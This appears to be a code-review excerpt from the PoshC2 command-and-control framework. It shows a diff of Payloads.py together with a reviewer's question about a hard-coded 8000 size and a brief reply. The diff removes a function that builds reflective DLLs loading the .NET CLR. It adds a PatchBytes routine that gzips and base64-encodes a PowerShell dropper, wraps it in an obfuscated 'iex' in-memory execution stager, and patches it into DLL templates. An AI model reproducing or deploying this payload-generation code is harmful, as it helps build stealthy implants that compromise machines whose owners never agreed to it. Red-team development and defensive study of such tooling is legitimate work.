poshc2/server/Payloads.py

```diff
@@ -238,112 +167,107 @@ def CreateDroppers(self, name=""):
         subprocess.check_output(compileexe, shell=True)
         self.QuickstartLog("C# Dropper EXE written to: %s%sdropper_cs.exe" % (self.BaseDirectory, name))
 
-    def CreateDlls(self, name=""):
-        # Load CLR "v2.0.50727"
-        self.QuickstartLog("" + Colours.END)
-        self.QuickstartLog("ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc)" + Colours.GREEN)
-        with open('%sPosh_v2_x86_dll.b64' % PayloadTemplatesDirectory, 'r') as f:
-            v2_86 = f.read()
-        self.PatchBytes("%sPosh_v2_x86.dll" % name, v2_86, offsetFinder('%sPosh_v2_x86_dll.b64' % PayloadTemplatesDirectory), "DLL")
-        with open('%sPosh_v2_x64_dll.b64' % PayloadTemplatesDirectory, 'r') as f:
-            v2_64 = f.read()
-        self.PatchBytes("%sPosh_v2_x64.dll" % name, v2_64, offsetFinder('%sPosh_v2_x64_dll.b64' % PayloadTemplatesDirectory), "DLL")
-
-        # Load CLR "v4.0.30319"
-        self.QuickstartLog("" + Colours.END)
-        self.QuickstartLog("ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc)" + Colours.GREEN)
-        with open('%sPosh_v4_x86_dll.b64' % PayloadTemplatesDirectory, 'r') as f:
-            v4_86 = f.read()
-        self.PatchBytes("%sPosh_v4_x86.dll" % name, v4_86, offsetFinder('%sPosh_v4_x86_dll.b64' % PayloadTemplatesDirectory), "DLL")
-        with open('%sPosh_v4_x64_dll.b64' % PayloadTemplatesDirectory, 'r') as f:
-            v4_64 = f.read()
-        self.PatchBytes("%sPosh_v4_x64.dll" % name, v4_64, offsetFinder('%sPosh_v4_x64_dll.b64' % PayloadTemplatesDirectory), "DLL")
+    def PatchBytes(self, filename, dll, offset, patchsize, name=""):
+        filename = "%s%s" % (self.BaseDirectory, filename)
+        output_file = open(filename, 'wb')
+        output_file.write(base64.b64decode(dll))
+        output_file.close()
+        srcfilename = ""
+
+        if "Posh_v2" in filename or "Posh_v4" in filename:
+            out = StringIO()
+            data = bytes(self.PSDropper, 'utf-8')
+            out = gzip.compress(data)
+            gzipdata = base64.b64encode(out).decode("utf-8")
+            b64gzip = "sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(\"%s\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
+            payload = base64.b64encode(b64gzip.encode('UTF-16LE'))
+            patch = payload.decode("utf-8")
+            patchlen = 8000 - len(patch)
```

Comment:
What dictates the '8000' (and 32000 etc elsewhere)? Can we dynamically calculate these or pull it out into a named constant so it's clear for the reader?

Reply:
Yeah its on the todo list for sure :dancers: